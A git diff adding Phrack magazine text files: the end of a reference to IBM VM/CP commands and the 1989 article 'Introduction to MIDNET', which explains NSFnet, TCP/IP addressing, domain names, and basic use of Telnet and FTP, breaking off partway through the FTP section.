+~~~~~   interruption pending for the specified virtual device.
+Privilege Class:  G
+Function Type:  G
+
+REPEAT : Use the REPEAT command to increase the number of copies of an output
+~~~~~~   file or to place the current output file in a hold status increasing
+or not increasing the number of copies to be created.
+Privilege Class:  D
+Function Type:  S
+
+REQUEST or REQ : Simply use the REQUEST command to make an attention interrupt
+~~~~~~~~~~~~~~   at your virtual console.
+Privilege Class:  G
+Function Type:  G
+
+RESET : Also in the format of RESET vaddr, this command is used to clear all
+~~~~~   pending interrupts from the specified virtual device.
+Privilege Class:  G
+Function Type:  G
+
+REWIND or REW : The REWIND command is used to rewind a real tape unit attached
+~~~~~~~~~~~~~   to your virtual machine at a specified virtual device address
+in the format REWIND vaddr.
+Privilege Class:  G
+Function Type:  G
+
+SAVESYS : This command allows you to save a virtual machine storage space with
+~~~~~~~   registers and the PSW as they currently exist.  It is used in the
+process of creating named systems.
+Privilege Class:  E
+Function Type:  A
+
+SCREEN or SCRE : Use the SCREEN command to alter or change any extended color
+~~~~~~~~~~~~~~   and/or extended highlight definitions for your virtual
+machine console.  You may issue the command from any IBM supported terminal or
+from a PROFILE EXEC because the SCREEN command is not device dependent.
+However, the SCREEN command is only valid when the Extended Color Feature has
+been applied to the terminal controller.
+
+You can assign extended color and extended highlighting values to six distinct
+display screen areas:  the input area, the system status area, and the output
+area that encompasses three other areas: CP output, virtual machine output,
+virtual machine output, and an input redisplay area.  The physical attributes
+of 3270 Information Display station screens vary according to model.
+
+Because this command mainly applies to people who are not on dial-up, I have
+elected not to detail all of the variables available with the SCREEN command.
+Once again, I recommend you using HELP CP SCREEN for details.
+Privilege Class:  G
+Function Type:  G
+
+SEND : Using the Single Console Image Facility, the SEND command is used to
+~~~~   pass commands and message replies for the secondary user's console to
+disconnect virtual machines for execution.  This command is executed in the
+format:  SEND (CP) userid (text).
+Privilege Class:  G
+Function Type:  G
+
+SET : Use the SET command to control various functions within your virtual
+~~~   system.  This command has a large number of variables that can be SET
+and details for each of the variables can be obtained from the HELP CP SET
+file.
+Privilege Class:  A, B, E, F, G
+Function Type:  O, R, A, C, G
+
+SHUTDOWN : This command, of course, systematically ends all virtual machine
+~~~~~~~~   functions and checkpoints the system for an eventual warn start.
+Privilege Class:  A
+Function Type:  O
+
+SLEEP or SL : To place the virtual machine in a dormant state but allow
+~~~~~~~~~~~   messages to be displayed, use the SLEEP command in the format
+of SLEEP nn (time-specification) where time-specification is SEC for seconds,
+MIN for minutes, or HR for hours and nn is the number of the amount of time
+for the machine to be in dormant state.
+Privilege Class:  G
+Function Type:  G
+
+SMSG or SM : The SMSG command is used to send a special message to a virtual
+~~~~~~~~~~   machine programmed to accept and process the message.  The format
+of this command is SMSG userid msgtext where userid is the userid to receive
+the message and msgtext is the message to be sent to the userid.
+Privilege Class:  G
+Function Type:  G
+
+SPACE : Use the SPACE command to force the output on a specified printer to be
+~~~~~   single spaced for the current active spool file regardless of the
+carriage control commands in the actual file.
+Privilege Class:  D
+Function Type:  S
+
+SPMODE : SPMODE allows the system operator to establish or reset the single
+~~~~~~   processor mode environment.
+Privilege Class:  A
+Function Type:  O
+
+SPOOL or SP : Use the SPOOL command to modify the spooling control options in
+~~~~~~~~~~~   effect for a given virtual spooling device or for a group of
+devices.  The SPOOL command can also start or stop the spooling of virtual
+console input and output.  You can direct a file to a remote location by using
+the SPOOL command in conjunction with the TAG command.
+Privilege Class:  G
+Function Type:  G
+
+SPTAPE : Use this command to dump spool files to tape or to load spool files
+~~~~~~   from tape.
+Privilege Class:  D
+Function Type:  S
+
+START : The START command restarts a spooling device after it has been drained
+~~~~~   or changes the output class that it may service.
+Privilege Class:  D
+Function Type:  S
+
+STCP : To alter the contents of real storage but not real PSW or real
+~~~~   registers, use the STCP command.
+Privilege Class:  C
+Function Type:  P
+
+STORE or ST : The STORE command is used to alter the contents of specified
+~~~~~~~~~~~   registers and locations of the virtual machine.  As well as
+saving virtual machine data in low storage, the contents of the following can
+be altered:
+
+  o  Virtual storage locations
+  o  General registers
+  o  Floating-point registers
+  o  Control registers
+  o  Program Status Word (PSW)
+Privilege Class:  G
+Function Type:  G
+
+SYSTEM or SYS : SYSTEM is used to simulate the action of the RESET and RESTART
+~~~~~~~~~~~~~   buttons on the real computer console, and to clear storage.
+The variables are as follows:
+
+  o  CLEAR : clears virtual storage and virtual storage keys to binary zeros.
+  o  RESET : clears all pending interrupts and conditions in the virtual
+             machine.
+  o  RESTART : simulates the hardware system RESTART function by storing the
+               current PSW at virtual location eight and loading, as the new
+               PSW, the doubleword from virtual location zero.
+Privilege Class:  G
+Function Type:  G
+
+TAG or TA : The TAG has many different variables that can be tagged, which are
+~~~~~~~~~   too many to list here because of different settings for each one,
+but it is used to associate file descriptive information with a spool file.
+Privilege Class:  G
+Function Type:  G
+
+TERMINAL or TERM : The TERMINAL command is used to control the following
+~~~~~~~~~~~~~~~~   functions associated with your virtual console:
+
+  o  Logical line-editing symbols
+  o  Masking of password
+  o  The APL character set
+  o  The Text character set
+  o  Signaling of an attention interrupt
+  o  Attention handling mode for your virtual console
+  o  Line length for output on your virtual console
+  o  Specifying terminal device type as 3101 or TTY
+  o  Location of cursor preceding terminal read
+  o  Scrolling rate for 3101 terminal
+Privilege Class:  G
+Function Type:  G
+
+TRACE or TR : Use the TRACE command to trace specified virtual machine
+~~~~~~~~~~~   activity and to record the results at the terminal, on a virtual
+spooled printer, or on both terminal and printer.  If you issue more than one
+TRACE command, the operands are cumulative; that is, operands specified for the
+first time are activated, whereas those specified with new modifiers are
+updated.  The RUN and NORUN operands, however, can be specified in different
+tracing functions and do not cause a conflict.
+
+You cannot issue the TRACE command while preferred machine assist is
+operating, whether or not you have enabled the preferred machine assist
+feature's control switch assist.
+Privilege Class:  G
+Function Type:  G
+
+TRANSFER or TRAN : This command is used to transfer your closed spool files to
+~~~~~~~~~~~~~~~~   a specified user or queue, or to reclaim closed spool files
+that you created.
+Privilege Class:  D, G
+Function Type:  S, G
+
+UNLOCK : Use the UNLOCK command to unlock page frames previously locked by a
+~~~~~~   LOCK command.
+Privilege Class:  A
+Function Type:  O
+
+VARY : The VARY command marks a device available or unavailable for use by a
+~~~~   user or the control program.
+Privilege Class:  B
+Function Type:  R
+
+VMDUMP or VMD : The VMDUMP command dumps virtual storage that VM/SP HPO
+~~~~~~~~~~~~~   creates for the virtual machine user.  VMDUMP dumps the
+following:
+
+  o  Virtual Program Status Word (PSW)
+  o  General registers
+  o  Floating-point registers
+  o  Control registers
+  o  Storage protection keys
+  o  Virtual machine type identification
+  o  Timer values
+Privilege Class:  G
+Function Type:  G
+
+WARNING : Use the WARNING command to transmit high-priority messages to a
+~~~~~~~   specified user or to all users.
+Privilege Class:  A, B
+Function Type:  O
+
+~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
+This article is far from totally complete as far as in-depthness goes.  As I
+have stated in numerous portions of this file, the VM/CMS system has a very
+good HELP file system, and from CMS, the command HELP CP <command> will, in
+most cases, allow you to read a relatively clear text file containing the
+details and usage specifications of these commands.  I hope that, should you be
+moving around a VM/CMS system, this file will assist you in the CP mode.
+
+For those that wish to contact me for commentary on this file topic or other
+topic conversation, you can send e-mail to my network addresses:
+
+                    Internet:  C488869@UMCVMB.MISSOURI.EDU
+                      Bitnet:  C488869@UMCVMB.BITNET
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
diff --git a/phrack27/3.txt b/phrack27/3.txt
new file mode 100644
index 0000000..611ae32
--- /dev/null
+++ b/phrack27/3.txt
@@ -0,0 +1,660 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 3 of 12
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                   Introduction to MIDNET                   <>
+       <>                   ~~~~~~~~~~~~~~~~~~~~~~                   <>
+       <>        Chapter Seven Of The Future Transcendent Saga       <>
+       <>                                                            <>
+       <>               A More Indepth Look Into NSFnet              <>
+       <>             National Science Foundation Network            <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                        June 16, 1989                       <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Prologue
+~~~~~~~~
+If you are not already familiar with NSFnet, I would suggest that you read:
+
+"Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely;
+"NSFnet:  National Science Foundation Network" (Phrack Inc., Volume Three,
+                                                Issue 26, File 4 of 11).
+
+
+Table Of Contents
+~~~~~~~~~~~~~~~~~
+*  Introduction
+*  The DOD Protocol Suite
+*  Names and Addresses In A Network
+*  Telnet (*NOT* Telenet)
+*  File Transfer
+*  Mail
+
+
+Introduction
+~~~~~~~~~~~~
+MIDNET is a regional computer network that is part of the NSFnet, the National
+Science Foundation Network.  Currently, eleven mid-United States universities
+are connected to each other and to the NSFnet via MIDnet:
+
+UA  - University of Arkansas at Fayetteville
+ISU - Iowa State University at Ames
+UI  - University of Iowa at Iowa City
+KSU - Kansas State University at Manhattan
+KU  - University of Kansas at Lawrence
+UMC - University of Missouri at Columbia
+WU  - Washington University at St. Louis, Missouri
+UNL - University of Nebraska at Lincoln
+OSU - Oklahoma State University at Stillwater
+UT  - University of Tulsa (Oklahoma)
+OU  - University of Oklahoma at Norman
+
+Researchers at any of these universities that have funded grants can access the
+six supercomputer centers funded by the NSF:
+
+John Von Neuman Supercomputer Center
+National Center for Atmospheric Research
+Cornell National Supercomputer Facility
+National Center for Supercomputing Applications
+Pittsburgh Supercomputing Center
+San Diego Supercomputing Center
+
+In addition, researchers and scientists can communicate with each other over a
+vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet,
+BITnet, and others that you have read about in The Future Transcendent Saga.
+Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13)
+for more details.
+
+MIDnet is just one of several regional computer networks that comprise the
+NSFnet system.  Although all of these regional computer networks work the same,
+MIDnet is the only one that I have direct access to and so this file is written
+from a MIDnet point of view.  For people who have access to the other regional
+networks of NSFnet, the only real differences depicted in this file that would
+not apply to the other regional networks are the universities that are served
+by MIDnet as opposed to:
+
+NYSERnet  in New York State
+SURAnet   in the southeastern United States
+SEQSUInet in Texas
+BARRnet   in the San Francisco area
+MERIT     in Michigan
+
+           (There are others that are currently being constructed.)
+
+These regional networks all hook into the NSFnet backbone, which is a network
+that connects the six supercomputer centers.  For example, a person at Kansas
+State University can connect with a supercomputer via MIDnet and the NSFnet
+backbone.  That researcher can also send mail to colleagues at the University
+of Delaware by using MIDnet, NSFnet and SURAnet.  Each university has its own
+local computer network which connects on-campus computers as well as providing
+a means to connecting to a regional network.
+
+Some universities are already connected to older networks such as CSnet, the
+ARPAnet and BITnet.  In principal, any campus connected to any of these
+networks can access anyone else in any other network since there are gateways
+between the networks.
+
+Gateways are specialized computers that forward network traffic, thereby
+connecting networks.  In practice, these wide-area networks use different
+networking technology which make it impossible to provide full functionality
+across the gateways.  However, mail is almost universally supported across all
+gateways, so that a person at a BITnet site can send mail messages to a
+colleague at an ARPAnet site (or anywhere else for that matter).  You should
+already be somewhat familiar with this, but if not refer to;
+
+"Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13) and
+"Internet Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11)
+
+Computer networks rely on hardware and software that allow computers to
+communicate.  The language that enables network communication is called a
+protocol.  There are many different protocols in use today.  MIDnet uses the
+TCP/IP protocols, also known as the DOD (Department of Defense) Protocol Suite.
+
+Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet.  In fact,
+all the regional networks that are linked to the NSFnet backbone are required
+to use TCP/IP.  At the local campus level, TCP/IP is often used, although other
+protocols such as IBM's SNA and DEC's DECnet are common.  In order to
+communicate with a computer via  MIDnet and the NSFnet, a computer at a campus
+must use TCP/IP directly or use a gateway that will translate its protocols
+into TCP/IP.
+
+The Internet is a world-wide computer network that is the conglomeration of
+most of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the
+regionals, such as MIDnet.  To a lesser degree, other networks such as BITnet
+that can send mail to hosts on these networks are included as part of the
+Internet.  This huge network of networks, the Internet, as you have by now read
+all about in the pages of Phrack Inc., is a rapidly growing and very complex
+entity that allows sophisticated communication between scientists, students,
+government officials and others.  Being a part of this community is both
+exciting and challenging.
+
+This chapter of the Future Transcendent Saga gives a general description of the
+protocols and software used in MIDnet and the NSFNet.  A discussion of several
+of the more commonly used networking tools is also included to enable you to
+make practical use of the network as soon as possible.
+
+
+The DOD Protocol Suite
+~~~~~~~~~~~~~~~~~~~~~~
+The DOD Protocol Suite includes many different protocols.  Each protocol is a
+specification of how communication is to occur between computers.  Computer
+hardware and software vendors use the protocol to create programs and sometimes
+specialized hardware in order to implement the network function intended by the
+protocol.  Different implementations of the same protocol exist for the varied
+hardware and operating systems found in a network.
+
+The three most commonly used network functions are:
+
+Mail          -- Sending and receiving messages
+File Transfer -- Sending and receiving files
+Remote Login  -- Logging into a distant computer
+
+Of these, mail is probably the most commonly used.
+
+In the TCP/IP world, there are three different protocols that realize these
+functions:
+
+SMTP   -- (Simple Mail Transfer Protocol) Mail
+FTP    -- (File Transfer Protocol) sending and receiving files
+Telnet -- Remote login
+
+How to use these protocols is discussed in the next section.  At first glance,
+it is not obvious why these three functions are the most common.  After all,
+mail and file transfer seem to be the same thing.  However, mail messages are
+not identical to files, since they are usually comprised of only ASCII
+characters and are sequential in structure.  Files may contain binary data and
+have complicated, non-sequential structures.  Also, mail messages can usually
+tolerate some errors in transmission whereas files should not contain any
+errors.  Finally, file transfers usually occur in a secure setting (i.e. The
+users who are transferring files know each other's names and passwords and are
+permitted to transfer the file, whereas mail can be sent to anybody as long as
+their name is known).
+
+While mail and transfer accomplish the transfer of raw information from one
+computer to another, Telnet allows a distant user to process that information,
+either by logging in to a remote computer or by linking to another terminal.
+Telnet is most often used to remotely log in to a distant computer, but it is
+actually a general-purpose communications protocol.  I have found it incredibly
+useful over the last year.  In some ways, it could be used for a great deal of
+access because you can directly connect to another computer anywhere that has
+TCP/IP capabilities, however please note that Telnet is *NOT* Telenet.
+
+There are other functions that some networks provide, including the following:
+
+- Name to address translation for networks, computers and people
+- The current time
+- Quote of the day or fortune
+- Printing on a remote printer, or use of any other remote peripheral
+- Submission of batch jobs for non-interactive execution
+- Dialogues and conferencing between multiple users
+- Remote procedure call (i.e. Distributing program execution over several
+                              remote computers)
+- Transmission of voice or video information
+
+Some of these functions are still in the experimental stages and require faster
+computer networks than currently exist.  In the future, new functions will
+undoubtedly be invented and existing ones improved.
+
+The DOD Protocol Suite is a layered network architecture, which means that
+network functions are performed by different programs that work independently
+and in harmony with each other.  Not only are there different programs but
+there are different protocols.  The protocols SMTP, FTP and Telnet are
+described above.  Protocols have been defined for getting the current time, the
+quote of the day, and for translating names.  These protocols are called
+applications protocols because users directly interact with the programs that
+implement these protocols.
+
+The Transmission Control Protocol, TCP, is used by many of the application
+protocols.  Users almost never interact with TCP directly.  TCP establishes a
+reliable end-to-end connection between two processes on remote computers.  Data
+is sent through a network in small chunks called packets to improve reliability
+and performance.  TCP ensures that packets arrive in order and without errors.
+If a packet does have errors, TCP requests that the packet be retransmitted.
+
+In turn, TCP calls upon IP, Internet Protocol, to move the data from one
+network to another.  IP is still not the lowest layer of the architecture,
+since there is usually a "data link layer protocol" below it.  This can be any
+of a number of different protocols, two very common ones being X.25 and
+Ethernet.
+
+FTP, Telnet and SMTP are called "application protocols", since they are
+directly used by applications programs that enable users to make use of the
+network.  Network applications are the actual programs that implement these
+protocols and provide an interface between the user and the computer.  An
+implementation of a network protocol is a program or package of programs that
+provides the desired network function such as file transfer.  Since computers
+differ from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its
+own implementation of these protocols.  However, the protocols are standardized
+so that computers can interoperate over the network (i.e. Can understand and
+process each other's data).  For example, a TCP packet generated by an IBM
+computer can be read and processed by a DEC computer.
+
+In many instances, network applications programs use the name of the protocol.
+For example, the program that transfers files may be called "FTP" and the
+program that allows remote logins may be called "Telnet."  Sometimes these
+protocols are incorporated into larger packages, as is common with SMTP.  Many
+computers have mail programs that allow users on the same computer to send mail
+to each other.  SMTP functions are often added to these mail programs so that
+users can also send and receive mail through a network.  In such cases, there
+is no separate program called SMTP that the user can access, since the mail
+program provides the user interface to this network function.
+
+Specific implementation of network protocols, such as FTP, are tailored to the
+computer hardware and operating system on which they are used.  Therefore, the
+exact user interface varies from one implementation to another.  For example,
+the FTP protocol specifies a set of FTP commands which each FTP implementation
+must understand and process.  However, these are usually placed at a low level,
+often invisible to the user, who is given a higher set of commands to use.
+
+These higher-level commands are not standardized so they may vary from one
+implementation of FTP to another.  For some operating systems, not all of these
+commands make equal sense, such as "Change Directory," or may have different
+meanings.  Therefore the specific user interface that the user sees will
+probably differ.
+
+This file describes a generic implementation of the standard TCP/IP application
+protocols.  Users must consult local documentation for specifics at their
+sites.
+
+
+Names and Addresses In A Network
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In DOD Protocol Suite, each network is given a unique identifying number.  This
+number is assigned by a central authority, namely the Network Information
+Center run by SRI, abbreviated as SRI-NIC, in order to prevent more than one
+network from having the same network number.  For example, the ARPAnet has
+network number 10 while MIDnet has a longer number, namely 128.242.
+
+Each host in a network has a unique identification so other hosts can specify
+them unambiguously.  Host numbers are usually assigned by the organization that
+manages the network, rather than one central authority.  Host numbers do not
+need to be unique throughout the whole Internet but two hosts on the same
+network need to have unique host numbers.
+
+The combination of the network number and the host number is called the IP
+address of the host and is specified as a 32-bit binary number.  All IP
+addresses in the Internet are expressible as 32-bit numbers, although they are
+often written in dotted decimal notation.  Dotted decimal notation breaks the
+32-bit number into four eight-bit parts or octets and each octet is specified
+as a decimal number.  For example, 00000001 is the binary octet that specifies
+the decimal number 1, while 11000000 specifies 192.  Dotted decimal notation
+makes IP addresses much easier to read and remember.
+
+Computers in the Internet are also identified by hostnames, which are strings
+of characters, such as "phrackvax."  However, IP packets must specify the
+32-bit IP address instead of the hostname so  some way to translating hostnames
+to IP addresses must exist.
+
+One way is to have a table of hostnames and their corresponding IP addresses,
+called a hosttable.  Nearly every TCP/IP implementation has such a hosttable,
+although the weaknesses of this method are forcing a shift to a new scheme
+called the domain name system.  In UNIX systems, the hosttable is often called
+"/etc/hosts."  You can usually read this file and find out what the IP
+addresses of various hosts are.  Other systems may call this file by a
+different name and make it unavailable for public viewing.
+
+Users of computers are generally given accounts to which all charges for
+computer use are billed.  Even if computer time is free at an installation,
+accounts are used to distinguish between the users and enforce file
+protections.  The generic term "username" will be used in this file to refer to
+the name by which the computer account is accessed.
+
+In the early days of the ARPAnet which was the first network to use the TCP/IP
+protocols, computer users were identified by their username, followed by a
+commercial "at" sign (@), followed by the hostname on which the account
+existed.  Networks were not given names, per se, although the IP address
+specified a network number.
+
+For example, "knight@phrackvax" referred to user "knight" on host "phrackvax."
+This did not specify which network "phrackvax" was on, although that
+information could be obtained by examining the hosttable and the IP address for
+"phrackvax."  (However, "phrackvax" is a ficticious hostname used for this
+presentation.)
+
+As time went on, every computer on the network had to have an entry in its
+hosttable for every other computer on the network.  When several networks
+linked together to form the Internet, the problem of maintaining this central
+hosttable got out of hand.  Therefore, the domain name scheme was introduced to
+split up the hosttable and make it smaller and easier to maintain.
+
+In the new domain name scheme, users are still identified by their usernames,
+but hosts are now identified by their hostname and any and all domains of which
+they are a part.  For example, the following address,
+"KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB".
+However, host "UMCVMB" is a part of the domain "MISSOURI" " which is in turn
+part of the domain "EDU".  There are other domains in "EDU", although only one
+is named "MISSOURI".  In the domain "MISSOURI", there is only one host named
+"UMCVMB".
+
+However, other domains in "EDU" could theoretically have hosts named "UMCVMB"
+(although I would say that this is rather unlikely in this example).  Thus the
+combination of hostname and all its domains makes it unique.  The method of
+translating such names into IP addresses is no longer as straightforward as
+looking up the hostname in a table.  Several protocols and specialized network
+software called nameservers and resolvers implement the domain name scheme.
+
+Not all TCP/IP implementations support domain names because it is rather new.
+In those cases, the local hosttable provides the only way to translate
+hostnames to IP addresses.  The system manager of that computer will have to
+put an entry into the hosttable for every host that users may want to connect
+to.  In some cases, users may consult the nameserver themselves to find out the
+IP address for a given hostname and then use that IP address directly instead
+of a hostname.
+
+I have selected a few network hosts to demonstrate how a host system can be
+specified by both the hostname and host numerical address.  Some of the nodes I
+have selected are also nodes on BITnet, perhaps even some of the others that I
+do not make a note of due a lack of omniscent awareness about each and every
+single host system in the world :-)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Numerical      Hostname                   Location                       BITnet
+---------      --------                   --------                       ------
+18.72.0.39     ATHENA.MIT.EDU             (Mass. Institute of Technology)     ?
+26.0.0.73      SRI-NIC.ARPA               (DDN Network Information Center)    -
+36.21.0.13     MACBETH.STANFORD.EDU       (Stanford University)               ?
+36.21.0.60     PORTIA.STANFORD.EDU        (Stanford University)               ?
+128.2.11.131   ANDREW.CMU.EDU             (Carnegie Mellon University)   ANDREW
+128.3.254.13   LBL.GOV                    (Lawrence Berkeley Labrotories)   LBL
+128.6.4.7      RUTGERS.RUTGERS.EDU        (Rutgers University)                ?
+128.59.99.1    CUCARD.MED.COLUMBIA.EDU    (Columbia University)               ?
+128.102.18.3   AMES.ARC.NASA.GOV          (Ames Research Center [NASA])       -
+128.103.1.1    HARVARD.EDU                (Harvard University)          HARVARD
+128.111.24.40  HUB.UCSB.EDU               (Univ. Of Calif-Santa Barbara)      ?
+128.115.14.1   LLL-WINKEN.LLNL.GOV        (Lawrence Livermore Labratories)    -
+128.143.2.7    UVAARPA.VIRGINIA.EDU       (University of Virginia)            ?
+128.148.128.40 BROWNVM.BROWN.EDU          (Brown University)              BROWN
+128.163.1.5    UKCC.UKY.EDU               (University of Kentucky)         UKCC
+128.183.10.4   NSSDCA.GSFC.NASA.GOV       (Goddard Space Flight Center [NASA])-
+128.186.4.18   RAI.CC.FSU.EDU             (Florida State University)        FSU
+128.206.1.1    UMCVMB.MISSOURI.EDU        (Univ. of Missouri-Columbia)   UMCVMB
+128.208.1.15   MAX.ACS.WASHINGTON.EDU     (University of Washington)        MAX
+128.228.1.2    CUNYVM.CUNY.EDU            (City University of New York)  CUNYVM
+129.10.1.6     NUHUB.ACS.NORTHEASTERN.EDU (Northeastern University)       NUHUB
+131.151.1.4    UMRVMA.UMR.EDU             (University of Missouri-Rolla) UMRVMA
+192.9.9.1      SUN.COM                    (Sun Microsystems, Inc.)            -
+192.33.18.30   VM1.NODAK.EDU              (North Dakota State Univ.)    NDSUVM1
+192.33.18.50   PLAINS.NODAK.EDU           (North Dakota State Univ.)    NDSUVAX
+
+Please Note:  Not every system on BITnet has an IP address.  Likewise, not
+              every system that has an IP address is on BITnet.  Also, while
+              some locations like Stanford University may have nodes on BITnet
+              and have hosts on the IP as well, this does not neccessarily
+              imply that the systems on BITnet and on IP (the EDU domain in
+              this case) are the same systems.
+
+              Attempts to gain unauthorized access to systems on the Internet
+              are not tolerated and is legally a federal offense.  At some
+              hosts, they take this very seriously, especially the government
+              hosts such as NASA's Goddard Space Flight Center, where they do
+              not mind telling you so at the main prompt when you connect to
+              their system.
+
+              However, some nodes are public access to an extent.  The DDN
+              Network Information Center can be used by anyone.  The server and
+              database there have proven to be an invaluable source of
+              information when locating people, systems, and other information
+              that is related to the Internet.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Telnet
+
+~~~~~~
+Remote login refers to logging in to a remote computer from a terminal
+connected to a local computer.  Telnet is the standard protocol in the DOD
+Protocol Suite for accomplishing this.  The "rlogin" program, provided with
+Berkeley UNIX systems and some other systems, also enables remote login.
+
+For purposes of discussion, the "local computer" is the computer to which your
+terminal is directly connected while the "remote computer" is the computer on
+the network to which you are communicating and to which your terminal is *NOT*
+directly connected.
+
+Since some computers use a different method of attaching terminals to
+computers, a better definition would be the following:  The "local computer" is
+the computer that you are currently using and the "remote computer" is the
+computer on the network with which you are or will be communicating.  Note that
+the terms "host" and "computer" are synonymous in the following discussion.
+
+To use Telnet, simply enter the command: TELNET
+
+The prompt that Telnet gives is:  Telnet>
+
+(However, you can specify where you want to Telnet to immediately and bypass
+the the prompts and other delays by issuing the command:  TELNET [location].)
+
+There is help available by typing in ?.  This prints a list of all the valid
+subcommands that Telnet provides with a one-line explanation.
+
+Telnet> ?
+
+To connect to to another computer, use the open subcommand to open a connection
+to that computer.  For example, to connect to the host "UMCVMB.MISSOURI.EDU",
+do "open umcvmb.missouri.edu"
+
+Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu" into an
+IP address and will send a packet to that host requesting login.  If the remote
+host decides to let you attempt a login, it prompts you for your username and
+password.  If the host does not respond, Telnet will "time out" (i.e. Wait for
+a reasonable amount of time such as 20 seconds) and then terminate with a
+message such as "Host not responding."
+
+If your computer does not have an entry for a remote host in its hosttable and
+it cannot resolve the name, you can use the IP address explicitly in the telnet
+command.  For example,
+
+TELNET 26.0.0.73 (Note:  This is the IP address for the DDN Network Information
+                 Center [SRI-NIC.ARPA])
+
+If you are successful in logging in, your terminal is connected to the remote
+host.  For all intents and purposes, your terminal is directly hard-wired to
+that host and you should be able to do anything on your remote terminal that
+you can do at any local terminal.  There are a few exceptions to this rule,
+however.
+
+Telnet provides a network escape character, such as CONTROL-T. You can find out
+what the escape character is by entering the "status" subcommand:
+
+Telnet> status
+
+You can change the escape character by entering the "escape" subcommand:
+
+Telnet> escape
+
+When you type in the escape character, the Telnet prompt returns to your screen
+and you can enter subcommands.  For example, to break the connection, which
+usually logs you off the remote host, enter the subcommand "quit":
+
+Telnet> quit
+
+Your Telnet connection usually breaks when you log off the remote host, so the
+"quit" subcommand is not usually used to log off.
+
+When you are logged in to a remote computer via Telnet, remember that there is
+a time delay between your local computer and the remote one.  This often
+becomes apparent to users when scrolling a long file across the terminal screen
+nd they wish to cancel the scrolling by typing CONTROL-C or something similar.
+After typing the special control character, the scrolling continues.  The
+special control character takes a certain amount of time to reach the remote
+computer which is still scrolling information.  Thus response from the remote
+computer will not likely be as quick as response from a local computer.
+
+Once you are remotely logged on, the computer you are logged on to effectively
+becomes your "local computer," even though your original "local computer" still
+considers you logged on.  You can log on to a third computer which would then
+become your "local computer" and so on.  As you log out of each session, your
+previous session becomes active again.
+
+
+File Transfer
+~~~~~~~~~~~~~
+
+FTP is the program that allows files to be sent from one computer to another.
+"FTP" stands for "File Transfer Protocol".
+
+When you start using FTP, a communications channel with another computer on the
+network is opened.  For example, to start using FTP and initiate a file
+transfer session with a computer on the network called "UMCVMB", you would
+issue the following subcommand:
+
+FTP UMCVMB.MISSOURI.EDU
+
+Host "UMCVMB" will prompt you for an account name and password.  If your login
+is correct, FTP will tell you so, otherwise it will say "login incorrect."  Try
+again or abort the FTP program.  (This is usually done by typing a special
+control character such as CONTROL-C.  The "program abort" character varies from
+system to system.)
+
+Next you will see the FTP prompt, which is:
+
+Ftp>
+
+There are a number of subcommands of FTP.  The subcommand "?" will list these
+commands and a brief description of each one.
+
+You can initiate a file transfer in either direction with FTP, either from the
+remote host or to the remote host.  The "get" subcommand initiates a file
+transfer from the remote host (i.e. Tells the remote computer to send the file
+to the local computer [the one on which you issued the "ftp" command]).  Simply
+enter "get" and  FTP will prompt you for the remote host's file name and the
+(new) local host's file name.  Example:
+
+Ftp> get
+Remote file name?
+theirfile
+local file name?
+myfile
+
+ou can abbreviate this by typing both file names on the same line as the "get"
+subcommand.  If you do not specify a local file name, the new local file will
+be called the same thing as the remote file.  Valid FTP subcommands to get a
+file include the following:
+
+get theirfile myfile
+get doc.x25
+
+The "put" subcommand works in a similar fashion and is used to send a file from
+the local computer to the remote computer.  Enter the command "put" and FTP
+will prompt you for the local file name and then the remote file name.  If the
+transfer cannot be done because the file doesn't exist or for some other
+reason, FTP will print an error message.
+
+There are a number of other subcommands in FTP that allow you to do many more
+things.  Not all of these are standard so consult your local documentation or
+type a question mark at the FTP prompt.  Some functions often built into FTP
+include the ability to look at files before getting or putting them, the
+ability to change directories, the ability to delete files on the remote
+computer, and the ability to list the directory on the remote host.
+
+An intriguing capability of many FTP implementations is "third party
+transfers."  For example, if you are logged on computer A and you want to cause
+computer B to send a file to computer C, you can use FTP to connect to computer
+B and use the "rmtsend" command.  Of course, you have to know usernames and
+passwords on all three computers, since FTP never allows you to peek into
+someone's directory and files unless you know their username and password.
+
+The "cd" subcommand changes your working directory on the remote host.  The
+"lcd" subcommand changes the directory on the local host.  For UNIX systems,
+the meaning of these subcommands is obvious.  Other systems, especially those
+that do not have directory-structured file system, may not implement these
+commands or may implement them in a different manner.
+
+The "dir" and "ls" subcommands do the same thing, namely list the files in the
+working directory of of the remote host.
+
+The "list" subcommand shows the contents of a file without actually putting it
+into a file on the local computer.  This would be helpful if you just wanted to
+inspect a file.  You could interrupt it before it reached the end of the file
+by typing CONTROL-C or some other special character.  This is dependent on your
+FTP implementation.
+
+The "delete" command can delete files on the remote host.  You can also make
+and remove directories on the remote host with "mkdir" and "rmdir".  The
+"status" subcommand will tell you if you are connected and with whom and what
+the state of all your options are.
+
+If you are transferring binary files or files with any non-printable
+characters, turn binary mode on by entering the "binary" subcommand:
+
+binary
+
+To resume non-binary transfers, enter the "ascii" subcommand.
+
+Transferring a number of files can be done easily by using "mput" (multiple
+put) and "mget" (multiple get).  For example, to get every file in a particular
+directory, first issue a "cd" command to  change to that directory and then an
